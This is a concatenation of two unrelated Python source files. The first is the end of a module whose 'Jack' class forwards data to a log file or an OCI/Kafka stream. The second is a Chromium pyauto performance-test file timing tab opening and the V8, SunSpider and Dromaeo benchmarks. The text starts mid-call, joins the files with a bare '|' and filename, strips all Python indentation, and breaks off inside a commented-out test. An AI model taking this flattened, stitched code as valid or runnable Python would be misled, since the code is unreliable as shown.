mode="a",
maxBytes=max_bytes,
backupCount=backup_count,
encoding=None,
delay=0,
)
my_handler.setLevel(logging.INFO)
app_log = logging.getLogger("root")
app_log.setLevel(logging.INFO)
app_log.addHandler(my_handler)
return app_log
def get_kafka():
if get_env_bool("HIQ_OCI_STREAMING"):
from hiq.vendor_oci_streaming import OciStreamingClient
return OciStreamingClient()
return None
class Jack(object):
"""Jack is a lumberjack to send trees to remote HiQ server in his own process space
Jack is disabled by default. To enable it, set env variable JACK=1:
export JACK=1
"""
@staticmethod
def consumer_func(queue, lock):
if os.cpu_count() >= 2:
affinity_list = list(os.sched_getaffinity(0))
os.sched_setaffinity(0, set(affinity_list[len(affinity_list) // 2 :]))
pid = os.getpid()
logger = log_jack_rotated()
kafka_client = get_kafka()
with lock:
print("🅹 🅰 🅒 Ⓚ {} is started".format(pid))
while True:
try:
data = queue.get()
for key, value in data.items():
"""
tree = Tree(value)
itree._itree.consolidate(tree.root)
# tree.show()
data = tree.repr()
"""
if logger:
logger.info(key + "," + value)
if kafka_client:
kafka_client.produce_messages(key, value)
# with lock:
# print(k, t)
# print("🅹 {} got {} {}".format(pid, key, data))
except Exception as e:
time.sleep(0.1)
print(e)
def __init__(sf, *args, **kwargs):
sf.invite_jack = get_env_bool("JACK")
if not sf.invite_jack:
sf.queue_jack = sf.consumer = None
return
sf.queue_jack = Queue()
sf.lock = Lock()
sf.consumer = Process(target=Jack.consumer_func, args=(sf.queue_jack, sf.lock))
        # This is critical! The consumer function has an infinite loop,
        # which means it will never exit unless we mark the process as a daemon.
sf.consumer.daemon = True
sf.consumer.start()
def __del__(sf):
if sf.consumer:
sf.consumer.join()
@_check_overhead
def send_trees_to_jack(sf, d: dict, debug=False):
if not sf.queue_jack:
if debug:
print("Jack is working")
return
data = {}
for k, val in d.items():
data[k] = val.repr()
sf.queue_jack.put_nowait(data)
|
perf.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Basic pyauto performance tests.
For tests that need to be run for multiple iterations (e.g., so that average
and standard deviation values can be reported), the default number of iterations
run for each of these tests is specified by |_DEFAULT_NUM_ITERATIONS|.
That value can optionally be tweaked by setting an environment variable
'NUM_ITERATIONS' to a positive integer, representing the number of iterations
to run. An additional, initial iteration will also be run to "warm up" the
environment, and the result from that initial iteration will be ignored.
Some tests rely on repeatedly appending tabs to Chrome. Occasionally, these
automation calls time out, thereby affecting the timing measurements (see issue
crosbug.com/20503). To work around this, the tests discard timing measurements
that involve automation timeouts. The value |_DEFAULT_MAX_TIMEOUT_COUNT|
specifies the threshold number of timeouts that can be tolerated before the test
fails. To tweak this value, set environment variable 'MAX_TIMEOUT_COUNT' to the
desired threshold value.
"""
import BaseHTTPServer
import commands
import errno
import itertools
import logging
import math
import os
import posixpath
import re
import SimpleHTTPServer
import SocketServer
import signal
import subprocess
import sys
import tempfile
import threading
import time
import timeit
import urllib
import urllib2
import urlparse
import pyauto_functional # Must be imported before pyauto.
import pyauto
import simplejson # Must be imported after pyauto; located in third_party.
from netflix import NetflixTestHelper
import pyauto_utils
import test_utils
from youtube import YoutubeTestHelper
_CHROME_BASE_DIR = os.path.abspath(os.path.join(
os.path.dirname(__file__), os.pardir, os.pardir, os.pardir, os.pardir))
def FormatChromePath(posix_path, **kwargs):
"""Convert a path relative to the Chromium root into an OS-specific path.
Args:
posix_path: a path string that may be a format().
Example: 'src/third_party/{module_name}/__init__.py'
kwargs: args for the format replacement.
Example: {'module_name': 'pylib'}
Returns:
an absolute path in the current Chromium tree with formatting applied.
"""
  formatted_path = posix_path.format(**kwargs)
  path_parts = formatted_path.split('/')
return os.path.join(_CHROME_BASE_DIR, *path_parts)
def StandardDeviation(values):
"""Returns the standard deviation of |values|."""
avg = Mean(values)
if len(values) < 2 or not avg:
return 0.0
temp_vals = [math.pow(x - avg, 2) for x in values]
return math.sqrt(sum(temp_vals) / (len(temp_vals) - 1))
def Mean(values):
"""Returns the arithmetic mean of |values|."""
if not values or None in values:
return None
return sum(values) / float(len(values))
def GeometricMean(values):
"""Returns the geometric mean of |values|."""
if not values or None in values or [x for x in values if x < 0.0]:
return None
if 0.0 in values:
return 0.0
return math.exp(Mean([math.log(x) for x in values]))
class BasePerfTest(pyauto.PyUITest):
"""Base class for performance tests."""
_DEFAULT_NUM_ITERATIONS = 10 # Keep synced with desktopui_PyAutoPerfTests.py.
_DEFAULT_MAX_TIMEOUT_COUNT = 10
_PERF_OUTPUT_MARKER_PRE = '_PERF_PRE_'
_PERF_OUTPUT_MARKER_POST = '_PERF_POST_'
def setUp(self):
"""Performs necessary setup work before running each test."""
self._num_iterations = self._DEFAULT_NUM_ITERATIONS
if 'NUM_ITERATIONS' in os.environ:
self._num_iterations = int(os.environ['NUM_ITERATIONS'])
self._max_timeout_count = self._DEFAULT_MAX_TIMEOUT_COUNT
if 'MAX_TIMEOUT_COUNT' in os.environ:
self._max_timeout_count = int(os.environ['MAX_TIMEOUT_COUNT'])
self._timeout_count = 0
# For users who want to see local perf graphs for Chrome when running the
# tests on their own machines.
self._local_perf_dir = None
if 'LOCAL_PERF_DIR' in os.environ:
self._local_perf_dir = os.environ['LOCAL_PERF_DIR']
if not os.path.exists(self._local_perf_dir):
self.fail('LOCAL_PERF_DIR environment variable specified as %s, '
'but this directory does not exist.' % self._local_perf_dir)
# When outputting perf graph information on-the-fly for Chrome, this
# variable lets us know whether a perf measurement is for a new test
# execution, or the current test execution.
self._seen_graph_lines = {}
pyauto.PyUITest.setUp(self)
# Flush all buffers to disk and wait until system calms down. Must be done
# *after* calling pyauto.PyUITest.setUp, since that is where Chrome is
# killed and re-initialized for a new test.
# TODO(dennisjeffrey): Implement wait for idle CPU on Windows/Mac.
    if self.IsLinux():  # IsLinux() is also True on ChromeOS.
os.system('sync')
self._WaitForIdleCPU(60.0, 0.05)
def _IsPIDRunning(self, pid):
"""Checks if a given process id is running.
Args:
pid: The process id of the process to check.
Returns:
True if the process is running. False if not.
"""
try:
# Note that this sends the signal 0, which should not interfere with the
# process.
os.kill(pid, 0)
except OSError, err:
if err.errno == errno.ESRCH:
return False
try:
with open('/proc/%s/status' % pid) as proc_file:
if 'zombie' in proc_file.read():
return False
except IOError:
return False
return True
def _GetAllDescendentProcesses(self, pid):
pstree_out = subprocess.check_output(['pstree', '-p', '%s' % pid])
children = re.findall('\((\d+)\)', pstree_out)
return [int(pid) for pid in children]
def _WaitForChromeExit(self, browser_info, timeout):
pid = browser_info['browser_pid']
chrome_pids = self._GetAllDescendentProcesses(pid)
initial_time = time.time()
while time.time() - initial_time < timeout:
if any([self._IsPIDRunning(pid) for pid in chrome_pids]):
time.sleep(1)
else:
logging.info('_WaitForChromeExit() took: %s seconds',
time.time() - initial_time)
return
self.fail('_WaitForChromeExit() did not finish within %s seconds' %
timeout)
def tearDown(self):
if self._IsPGOMode():
browser_info = self.GetBrowserInfo()
pid = browser_info['browser_pid']
# session_manager kills chrome without waiting for it to cleanly exit.
# Until that behavior is changed, we stop it and wait for Chrome to exit
# cleanly before restarting it. See:
# crbug.com/264717
subprocess.call(['sudo', 'pkill', '-STOP', 'session_manager'])
os.kill(pid, signal.SIGINT)
self._WaitForChromeExit(browser_info, 120)
subprocess.call(['sudo', 'pkill', '-CONT', 'session_manager'])
pyauto.PyUITest.tearDown(self)
def _IsPGOMode(self):
return 'USE_PGO' in os.environ
def _WaitForIdleCPU(self, timeout, utilization):
"""Waits for the CPU to become idle (< utilization).
Args:
timeout: The longest time in seconds to wait before throwing an error.
utilization: The CPU usage below which the system should be considered
idle (between 0 and 1.0 independent of cores/hyperthreads).
"""
time_passed = 0.0
fraction_non_idle_time = 1.0
logging.info('Starting to wait up to %fs for idle CPU...', timeout)
while fraction_non_idle_time >= utilization:
cpu_usage_start = self._GetCPUUsage()
time.sleep(2)
time_passed += 2.0
cpu_usage_end = self._GetCPUUsage()
fraction_non_idle_time = \
self._GetFractionNonIdleCPUTime(cpu_usage_start, cpu_usage_end)
logging.info('Current CPU utilization = %f.', fraction_non_idle_time)
if time_passed > timeout:
self._LogProcessActivity()
message = ('CPU did not idle after %fs wait (utilization = %f).' % (
time_passed, fraction_non_idle_time))
# crosbug.com/37389
if self._IsPGOMode():
logging.info(message)
logging.info('Still continuing because we are in PGO mode.')
return
self.fail(message)
logging.info('Wait for idle CPU took %fs (utilization = %f).',
time_passed, fraction_non_idle_time)
def _LogProcessActivity(self):
"""Logs the output of top on Linux/Mac/CrOS.
TODO: use taskmgr or similar on Windows.
"""
    if self.IsLinux() or self.IsMac():  # IsLinux() is also True on ChromeOS.
logging.info('Logging current process activity using top.')
cmd = 'top -b -d1 -n1'
if self.IsMac():
cmd = 'top -l1'
p = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT, close_fds=True)
output = p.stdout.read()
logging.info(output)
else:
logging.info('Process activity logging not implemented on this OS.')
def _AppendTab(self, url):
"""Appends a tab and increments a counter if the automation call times out.
Args:
url: The string url to which the appended tab should be navigated.
"""
if not self.AppendTab(pyauto.GURL(url)):
self._timeout_count += 1
def _MeasureElapsedTime(self, python_command, num_invocations=1):
"""Measures time (in msec) to execute a python command one or more times.
Args:
python_command: A callable.
num_invocations: An integer number of times to invoke the given command.
Returns:
The time required to execute the python command the specified number of
times, in milliseconds as a float.
"""
assert callable(python_command)
def RunCommand():
for _ in range(num_invocations):
python_command()
timer = timeit.Timer(stmt=RunCommand)
return timer.timeit(number=1) * 1000 # Convert seconds to milliseconds.
def _OutputPerfForStandaloneGraphing(self, graph_name, description, value,
units, units_x, is_stacked):
"""Outputs perf measurement data to a local folder to be graphed.
This function only applies to Chrome desktop, and assumes that environment
variable 'LOCAL_PERF_DIR' has been specified and refers to a valid directory
on the local machine.
Args:
graph_name: A string name for the graph associated with this performance
value.
description: A string description of the performance value. Should not
include spaces.
value: Either a single numeric value representing a performance
measurement, or else a list of (x, y) tuples representing one or more
long-running performance measurements, where 'x' is an x-axis value
(such as an iteration number) and 'y' is the corresponding performance
measurement. If a list of tuples is given, then the |units_x|
argument must also be specified.
units: A string representing the units of the performance measurement(s).
Should not include spaces.
units_x: A string representing the units of the x-axis values associated
with the performance measurements, such as 'iteration' if the x values
are iteration numbers. If this argument is specified, then the
|value| argument must be a list of (x, y) tuples.
is_stacked: True to draw a "stacked" graph. First-come values are
stacked at bottom by default.
"""
revision_num_file = os.path.join(self._local_perf_dir, 'last_revision.dat')
if os.path.exists(revision_num_file):
with open(revision_num_file) as f:
revision = int(f.read())
else:
revision = 0
if not self._seen_graph_lines:
# We're about to output data for a new test run.
revision += 1
# Update graphs.dat.
existing_graphs = []
graphs_file = os.path.join(self._local_perf_dir, 'graphs.dat')
if os.path.exists(graphs_file):
with open(graphs_file) as f:
existing_graphs = simplejson.loads(f.read())
is_new_graph = True
for graph in existing_graphs:
if graph['name'] == graph_name:
is_new_graph = False
break
if is_new_graph:
new_graph = {
'name': graph_name,
'units': units,
'important': False,
}
if units_x:
new_graph['units_x'] = units_x
existing_graphs.append(new_graph)
with open(graphs_file, 'w') as f:
f.write(simplejson.dumps(existing_graphs))
os.chmod(graphs_file, 0755)
# Update data file for this particular graph.
existing_lines = []
data_file = os.path.join(self._local_perf_dir, graph_name + '-summary.dat')
if os.path.exists(data_file):
with open(data_file) as f:
existing_lines = f.readlines()
existing_lines = map(
simplejson.loads, map(lambda x: x.strip(), existing_lines))
seen_key = graph_name
# We assume that the first line |existing_lines[0]| is the latest.
if units_x:
new_line = {
'rev': revision,
'traces': { description: [] }
}
if seen_key in self._seen_graph_lines:
# We've added points previously for this graph line in the current
# test execution, so retrieve the original set of points specified in
# the most recent revision in the data file.
new_line = existing_lines[0]
if not description in new_line['traces']:
new_line['traces'][description] = []
for x_value, y_value in value:
new_line['traces'][description].append([str(x_value), str(y_value)])
else:
new_line = {
'rev': revision,
'traces': { description: [str(value), str(0.0)] }
}
if is_stacked:
new_line['stack'] = True
if 'stack_order' not in new_line:
new_line['stack_order'] = []
if description not in new_line['stack_order']:
new_line['stack_order'].append(description)
if seen_key in self._seen_graph_lines:
# Update results for the most recent revision.
existing_lines[0] = new_line
else:
# New results for a new revision.
existing_lines.insert(0, new_line)
self._seen_graph_lines[seen_key] = True
existing_lines = map(simplejson.dumps, existing_lines)
with open(data_file, 'w') as f:
f.write('\n'.join(existing_lines))
os.chmod(data_file, 0755)
with open(revision_num_file, 'w') as f:
f.write(str(revision))
def _OutputPerfGraphValue(self, description, value, units,
graph_name, units_x=None, is_stacked=False):
"""Outputs a performance value to have it graphed on the performance bots.
The output format differs, depending on whether the current platform is
Chrome desktop or ChromeOS.
For ChromeOS, the performance bots have a 30-character limit on the length
of the key associated with a performance value. A key on ChromeOS is
considered to be of the form "units_description" (for example,
"milliseconds_NewTabPage"), and is created from the |units| and
|description| passed as input to this function. Any characters beyond the
length 30 limit are truncated before results are stored in the autotest
database.
Args:
description: A string description of the performance value. Should not
include spaces.
value: Either a numeric value representing a performance measurement, or
a list of values to be averaged. Lists may also contain (x, y) tuples
representing one or more performance measurements, where 'x' is an
x-axis value (such as an iteration number) and 'y' is the
corresponding performance measurement. If a list of tuples is given,
the |units_x| argument must also be specified.
units: A string representing the units of the performance measurement(s).
Should not include spaces.
graph_name: A string name for the graph associated with this performance
value. Only used on Chrome desktop.
units_x: A string representing the units of the x-axis values associated
with the performance measurements, such as 'iteration' if the x values
are iteration numbers. If this argument is specified, then the
|value| argument must be a list of (x, y) tuples.
is_stacked: True to draw a "stacked" graph. First-come values are
stacked at bottom by default.
"""
if (isinstance(value, list) and value[0] is not None and
isinstance(value[0], tuple)):
assert units_x
if units_x:
assert isinstance(value, list)
if self.IsChromeOS():
# Autotest doesn't support result lists.
autotest_value = value
if (isinstance(value, list) and value[0] is not None and
not isinstance(value[0], tuple)):
autotest_value = Mean(value)
if units_x:
# TODO(dennisjeffrey): Support long-running performance measurements on
# ChromeOS in a way that can be graphed: crosbug.com/21881.
pyauto_utils.PrintPerfResult(graph_name, description, autotest_value,
units + ' ' + units_x)
else:
# Output short-running performance results in a format understood by
# autotest.
perf_key = '%s_%s' % (units, description)
if len(perf_key) > 30:
logging.warning('The description "%s" will be truncated to "%s" '
'(length 30) when added to the autotest database.',
perf_key, perf_key[:30])
print '\n%s(\'%s\', %f)%s' % (self._PERF_OUTPUT_MARKER_PRE,
perf_key, autotest_value,
self._PERF_OUTPUT_MARKER_POST)
# Also output results in the format recognized by buildbot, for cases
# in which these tests are run on chromeOS through buildbot. Since
# buildbot supports result lists, it's ok for |value| to be a list here.
pyauto_utils.PrintPerfResult(graph_name, description, value, units)
sys.stdout.flush()
else:
# TODO(dmikurube): Support stacked graphs in PrintPerfResult.
# See http://crbug.com/122119.
if units_x:
pyauto_utils.PrintPerfResult(graph_name, description, value,
units + ' ' + units_x)
else:
pyauto_utils.PrintPerfResult(graph_name, description, value, units)
if self._local_perf_dir:
self._OutputPerfForStandaloneGraphing(
graph_name, description, value, units, units_x, is_stacked)
def _OutputEventForStandaloneGraphing(self, description, event_list):
"""Outputs event information to a local folder to be graphed.
See function _OutputEventGraphValue below for a description of an event.
This function only applies to Chrome Endure tests running on Chrome desktop,
and assumes that environment variable 'LOCAL_PERF_DIR' has been specified
and refers to a valid directory on the local machine.
Args:
description: A string description of the event. Should not include
spaces.
event_list: A list of (x, y) tuples representing one or more events
occurring during an endurance test, where 'x' is the time of the event
(in seconds since the start of the test), and 'y' is a dictionary
representing relevant data associated with that event (as key/value
pairs).
"""
revision_num_file = os.path.join(self._local_perf_dir, 'last_revision.dat')
if os.path.exists(revision_num_file):
with open(revision_num_file) as f:
revision = int(f.read())
else:
revision = 0
if not self._seen_graph_lines:
# We're about to output data for a new test run.
revision += 1
existing_lines = []
data_file = os.path.join(self._local_perf_dir, '_EVENT_-summary.dat')
if os.path.exists(data_file):
with open(data_file) as f:
existing_lines = f.readlines()
existing_lines = map(eval, map(lambda x: x.strip(), existing_lines))
seen_event_type = description
value_list = []
if seen_event_type in self._seen_graph_lines:
# We've added events previously for this event type in the current
# test execution, so retrieve the original set of values specified in
# the most recent revision in the data file.
value_list = existing_lines[0]['events'][description]
for event_time, event_data in event_list:
value_list.append([str(event_time), event_data])
new_events = {
description: value_list
}
new_line = {
'rev': revision,
'events': new_events
}
if seen_event_type in self._seen_graph_lines:
# Update results for the most recent revision.
existing_lines[0] = new_line
else:
# New results for a new revision.
existing_lines.insert(0, new_line)
self._seen_graph_lines[seen_event_type] = True
existing_lines = map(str, existing_lines)
with open(data_file, 'w') as f:
f.write('\n'.join(existing_lines))
os.chmod(data_file, 0755)
with open(revision_num_file, 'w') as f:
f.write(str(revision))
def _OutputEventGraphValue(self, description, event_list):
"""Outputs a set of events to have them graphed on the Chrome Endure bots.
An "event" can be anything recorded by a performance test that occurs at
particular times during a test execution. For example, a garbage collection
in the v8 heap can be considered an event. An event is distinguished from a
regular perf measurement in two ways: (1) an event is depicted differently
in the performance graphs than performance measurements; (2) an event can
be associated with zero or more data fields describing relevant information
associated with the event. For example, a garbage collection event will
occur at a particular time, and it may be associated with data such as
the number of collected bytes and/or the length of time it took to perform
the garbage collection.
This function only applies to Chrome Endure tests running on Chrome desktop.
Args:
description: A string description of the event. Should not include
spaces.
event_list: A list of (x, y) tuples representing one or more events
occurring during an endurance test, where 'x' is the time of the event
(in seconds since the start of the test), and 'y' is a dictionary
representing relevant data associated with that event (as key/value
pairs).
"""
pyauto_utils.PrintPerfResult('_EVENT_', description, event_list, '')
if self._local_perf_dir:
self._OutputEventForStandaloneGraphing(description, event_list)
def _PrintSummaryResults(self, description, values, units, graph_name):
"""Logs summary measurement information.
This function computes and outputs the average and standard deviation of
the specified list of value measurements. It also invokes
_OutputPerfGraphValue() with the computed *average* value, to ensure the
average value can be plotted in a performance graph.
Args:
description: A string description for the specified results.
values: A list of numeric value measurements.
units: A string specifying the units for the specified measurements.
graph_name: A string name for the graph associated with this performance
value. Only used on Chrome desktop.
"""
logging.info('Overall results for: %s', description)
if values:
logging.info(' Average: %f %s', Mean(values), units)
logging.info(' Std dev: %f %s', StandardDeviation(values), units)
self._OutputPerfGraphValue(description, values, units, graph_name)
else:
logging.info('No results to report.')
def _RunNewTabTest(self, description, open_tab_command, graph_name,
num_tabs=1):
"""Runs a perf test that involves opening new tab(s).
This helper function can be called from different tests to do perf testing
with different types of tabs. It is assumed that the |open_tab_command|
will open up a single tab.
Args:
description: A string description of the associated tab test.
open_tab_command: A callable that will open a single tab.
graph_name: A string name for the performance graph associated with this
test. Only used on Chrome desktop.
num_tabs: The number of tabs to open, i.e., the number of times to invoke
the |open_tab_command|.
"""
assert callable(open_tab_command)
timings = []
for iteration in range(self._num_iterations + 1):
orig_timeout_count = self._timeout_count
elapsed_time = self._MeasureElapsedTime(open_tab_command,
num_invocations=num_tabs)
# Only count the timing measurement if no automation call timed out.
if self._timeout_count == orig_timeout_count:
# Ignore the first iteration.
if iteration:
timings.append(elapsed_time)
logging.info('Iteration %d of %d: %f milliseconds', iteration,
self._num_iterations, elapsed_time)
self.assertTrue(self._timeout_count <= self._max_timeout_count,
msg='Test exceeded automation timeout threshold.')
self.assertEqual(1 + num_tabs, self.GetTabCount(),
msg='Did not open %d new tab(s).' % num_tabs)
for _ in range(num_tabs):
self.CloseTab(tab_index=1)
self._PrintSummaryResults(description, timings, 'milliseconds', graph_name)
def _GetConfig(self):
"""Load perf test configuration file.
Returns:
A dictionary that represents the config information.
"""
config_file = os.path.join(os.path.dirname(__file__), 'perf.cfg')
config = {'username': None,
'password': None,
'google_account_url': 'https://accounts.google.com/',
'gmail_url': 'https://www.gmail.com',
'plus_url': 'https://plus.google.com',
'docs_url': 'https://docs.google.com'}
if os.path.exists(config_file):
try:
new_config = pyauto.PyUITest.EvalDataFrom(config_file)
for key in new_config:
if new_config.get(key) is not None:
config[key] = new_config.get(key)
except SyntaxError, e:
logging.info('Could not read %s: %s', config_file, str(e))
return config
def _LoginToGoogleAccount(self, account_key='test_google_account'):
"""Logs in to a test Google account.
Login with user-defined credentials if they exist.
Else login with private test credentials if they exist.
Else fail.
Args:
account_key: The string key in private_tests_info.txt which is associated
with the test account login credentials to use. It will only
be used when fail to load user-defined credentials.
Raises:
RuntimeError: if could not get credential information.
"""
private_file = os.path.join(pyauto.PyUITest.DataDir(), 'pyauto_private',
'private_tests_info.txt')
config_file = os.path.join(os.path.dirname(__file__), 'perf.cfg')
config = self._GetConfig()
google_account_url = config.get('google_account_url')
username = config.get('username')
password = config.get('password')
if username and password:
logging.info(
'Using google account credential from %s',
os.path.join(os.path.dirname(__file__), 'perf.cfg'))
elif os.path.exists(private_file):
creds = self.GetPrivateInfo()[account_key]
username = creds['username']
password = creds['password']
logging.info(
'User-defined credentials not found,' +
' using private test credentials instead.')
else:
message = 'No user-defined or private test ' \
'credentials could be found. ' \
'Please specify credential information in %s.' \
% config_file
raise RuntimeError(message)
test_utils.GoogleAccountsLogin(
self, username, password, url=google_account_url)
self.NavigateToURL('about:blank') # Clear the existing tab.
def _GetCPUUsage(self):
"""Returns machine's CPU usage.
This function uses /proc/stat to identify CPU usage, and therefore works
only on Linux/ChromeOS.
Returns:
A dictionary with 'user', 'nice', 'system' and 'idle' values.
Sample dictionary:
{
'user': 254544,
'nice': 9,
'system': 254768,
'idle': 2859878,
}
"""
try:
f = open('/proc/stat')
cpu_usage_str = f.readline().split()
f.close()
except IOError, e:
self.fail('Could not retrieve CPU usage: ' + str(e))
return {
'user': int(cpu_usage_str[1]),
'nice': int(cpu_usage_str[2]),
'system': int(cpu_usage_str[3]),
'idle': int(cpu_usage_str[4])
}
def _GetFractionNonIdleCPUTime(self, cpu_usage_start, cpu_usage_end):
"""Computes the fraction of CPU time spent non-idling.
This function should be invoked using before/after values from calls to
_GetCPUUsage().
"""
time_non_idling_end = (cpu_usage_end['user'] + cpu_usage_end['nice'] +
cpu_usage_end['system'])
time_non_idling_start = (cpu_usage_start['user'] + cpu_usage_start['nice'] +
cpu_usage_start['system'])
total_time_end = (cpu_usage_end['user'] + cpu_usage_end['nice'] +
cpu_usage_end['system'] + cpu_usage_end['idle'])
total_time_start = (cpu_usage_start['user'] + cpu_usage_start['nice'] +
cpu_usage_start['system'] + cpu_usage_start['idle'])
return ((float(time_non_idling_end) - time_non_idling_start) /
(total_time_end - total_time_start))
def ExtraChromeFlags(self):
"""Ensures Chrome is launched with custom flags.
Returns:
A list of extra flags to pass to Chrome when it is launched.
"""
flags = super(BasePerfTest, self).ExtraChromeFlags()
# Window size impacts a variety of perf tests, ensure consistency.
flags.append('--window-size=1024,768')
if self._IsPGOMode():
flags = flags + ['--child-clean-exit', '--no-sandbox']
return flags
class TabPerfTest(BasePerfTest):
"""Tests that involve opening tabs."""
def testNewTab(self):
"""Measures time to open a new tab."""
self._RunNewTabTest('NewTabPage',
lambda: self._AppendTab('chrome://newtab'), 'open_tab')
def testNewTabFlash(self):
"""Measures time to open a new tab navigated to a flash page."""
self.assertTrue(
os.path.exists(os.path.join(self.ContentDataDir(), 'plugin',
'flash.swf')),
msg='Missing required flash data file.')
url = self.GetFileURLForContentDataPath('plugin', 'flash.swf')
self._RunNewTabTest('NewTabFlashPage', lambda: self._AppendTab(url),
'open_tab')
def test20Tabs(self):
"""Measures time to open 20 tabs."""
self._RunNewTabTest('20TabsNewTabPage',
lambda: self._AppendTab('chrome://newtab'),
'open_20_tabs', num_tabs=20)
class BenchmarkPerfTest(BasePerfTest):
"""Benchmark performance tests."""
def testV8BenchmarkSuite(self):
"""Measures score from v8 benchmark suite."""
url = self.GetFileURLForDataPath('v8_benchmark_v6', 'run.html')
def _RunBenchmarkOnce(url):
"""Runs the v8 benchmark suite once and returns the results in a dict."""
self.assertTrue(self.AppendTab(pyauto.GURL(url)),
msg='Failed to append tab for v8 benchmark suite.')
js_done = """
var val = document.getElementById("status").innerHTML;
window.domAutomationController.send(val);
"""
self.assertTrue(
self.WaitUntil(
lambda: 'Score:' in self.ExecuteJavascript(js_done, tab_index=1),
timeout=300, expect_retval=True, retry_sleep=1),
msg='Timed out when waiting for v8 benchmark score.')
js_get_results = """
var result = {};
result['final_score'] = document.getElementById("status").innerHTML;
result['all_results'] = document.getElementById("results").innerHTML;
window.domAutomationController.send(JSON.stringify(result));
"""
results = eval(self.ExecuteJavascript(js_get_results, tab_index=1))
score_pattern = '(\w+): (\d+)'
final_score = re.search(score_pattern, results['final_score']).group(2)
result_dict = {'final_score': int(final_score)}
for match in re.finditer(score_pattern, results['all_results']):
benchmark_name = match.group(1)
benchmark_score = match.group(2)
result_dict[benchmark_name] = int(benchmark_score)
self.CloseTab(tab_index=1)
return result_dict
timings = {}
for iteration in xrange(self._num_iterations + 1):
result_dict = _RunBenchmarkOnce(url)
# Ignore the first iteration.
if iteration:
for key, val in result_dict.items():
timings.setdefault(key, []).append(val)
logging.info('Iteration %d of %d:\n%s', iteration,
self._num_iterations, self.pformat(result_dict))
for key, val in timings.items():
if key == 'final_score':
self._PrintSummaryResults('V8Benchmark', val, 'score',
'v8_benchmark_final')
else:
self._PrintSummaryResults('V8Benchmark-%s' % key, val, 'score',
'v8_benchmark_individual')
def testSunSpider(self):
"""Runs the SunSpider javascript benchmark suite."""
url = self.GetFileURLForDataPath('sunspider', 'sunspider-driver.html')
self.assertTrue(self.AppendTab(pyauto.GURL(url)),
msg='Failed to append tab for SunSpider benchmark suite.')
js_is_done = """
var done = false;
if (document.getElementById("console"))
done = true;
window.domAutomationController.send(JSON.stringify(done));
"""
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js_is_done, tab_index=1),
timeout=300, expect_retval='true', retry_sleep=1),
msg='Timed out when waiting for SunSpider benchmark score.')
js_get_results = """
window.domAutomationController.send(
document.getElementById("console").innerHTML);
"""
# Append '<br>' to the result to simplify regular expression matching.
results = self.ExecuteJavascript(js_get_results, tab_index=1) + '<br>'
total = re.search('Total:\s*([\d.]+)ms', results).group(1)
logging.info('Total: %f ms', float(total))
self._OutputPerfGraphValue('SunSpider-total', float(total), 'ms',
'sunspider_total')
for match_category in re.finditer('\s\s(\w+):\s*([\d.]+)ms.+?<br><br>',
results):
category_name = match_category.group(1)
category_result = match_category.group(2)
logging.info('Benchmark "%s": %f ms', category_name,
float(category_result))
self._OutputPerfGraphValue('SunSpider-' + category_name,
float(category_result), 'ms',
'sunspider_individual')
for match_result in re.finditer('<br>\s\s\s\s([\w-]+):\s*([\d.]+)ms',
match_category.group(0)):
result_name = match_result.group(1)
result_value = match_result.group(2)
logging.info(' Result "%s-%s": %f ms', category_name, result_name,
float(result_value))
self._OutputPerfGraphValue(
'SunSpider-%s-%s' % (category_name, result_name),
float(result_value), 'ms', 'sunspider_individual')
def testDromaeoSuite(self):
"""Measures results from Dromaeo benchmark suite."""
url = self.GetFileURLForDataPath('dromaeo', 'index.html')
self.assertTrue(self.AppendTab(pyauto.GURL(url + '?dromaeo')),
msg='Failed to append tab for Dromaeo benchmark suite.')
js_is_ready = """
var val = document.getElementById('pause').value;
window.domAutomationController.send(val);
"""
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js_is_ready, tab_index=1),
timeout=30, expect_retval='Run', retry_sleep=1),
msg='Timed out when waiting for Dromaeo benchmark to load.')
js_run = """
$('#pause').val('Run').click();
window.domAutomationController.send('done');
"""
self.ExecuteJavascript(js_run, tab_index=1)
js_is_done = """
var val = document.getElementById('timebar').innerHTML;
window.domAutomationController.send(val);
"""
self.assertTrue(
self.WaitUntil(
lambda: 'Total' in self.ExecuteJavascript(js_is_done, tab_index=1),
timeout=900, expect_retval=True, retry_sleep=2),
msg='Timed out when waiting for Dromaeo benchmark to complete.')
js_get_results = """
var result = {};
result['total_result'] = $('#timebar strong').html();
result['all_results'] = {};
$('.result-item.done').each(function (i) {
var group_name = $(this).find('.test b').html().replace(':', '');
var group_results = {};
group_results['result'] =
$(this).find('span').html().replace('runs/s', '')
group_results['sub_groups'] = {}
$(this).find('li').each(function (i) {
var sub_name = $(this).find('b').html().replace(':', '');
group_results['sub_groups'][sub_name] =
$(this).text().match(/: ([\d.]+)/)[1]
});
result['all_results'][group_name] = group_results;
});
window.domAutomationController.send(JSON.stringify(result));
"""
results = eval(self.ExecuteJavascript(js_get_results, tab_index=1))
total_result = results['total_result']
logging.info('Total result: ' + total_result)
self._OutputPerfGraphValue('Dromaeo-total', float(total_result),
'runsPerSec', 'dromaeo_total')
for group_name, group in results['all_results'].iteritems():
logging.info('Benchmark "%s": %s', group_name, group['result'])
self._OutputPerfGraphValue('Dromaeo-' + group_name.replace(' ', ''),
float(group['result']), 'runsPerSec',
'dromaeo_individual')
for benchmark_name, benchmark_score in group['sub_groups'].iteritems():
logging.info(' Result "%s": %s', benchmark_name, benchmark_score)
def testSpaceport(self):
"""Measures results from Spaceport benchmark suite."""
# TODO(tonyg): Test is failing on bots. Diagnose and re-enable.
pass
# url = self.GetFileURLForDataPath('third_party', 'spaceport', 'index.html')
# self.assertTrue(self.AppendTab(pyauto.GURL(url + '?auto')),
# msg='Failed to append tab for Spaceport benchmark suite.')
#
# # The test reports results to console.log in the format "name: value".
# # Inject a bit of JS to intercept those.
# js_collect_console_log = """
# window.__pyautoresult = {};
# window.console.log = function(str) {
# if (!str) return;
# var key_val = str.split(': ');
# if (!key_val.length == 2) return;
# __pyautoresult[key_val[0]] = key_val[1];
# };
# window.domAutomationController.send('done');
# """
# self.ExecuteJavascript(js_collect_console_log, tab_index=1)
#
# def _IsDone():
# expected_num_results = 30 # The number of tests in benchmark.
# results = eval(self.ExecuteJavascript(js_get_results, tab_index=1))
# return expected_num_results == len(results)
#
# js_get_results = """
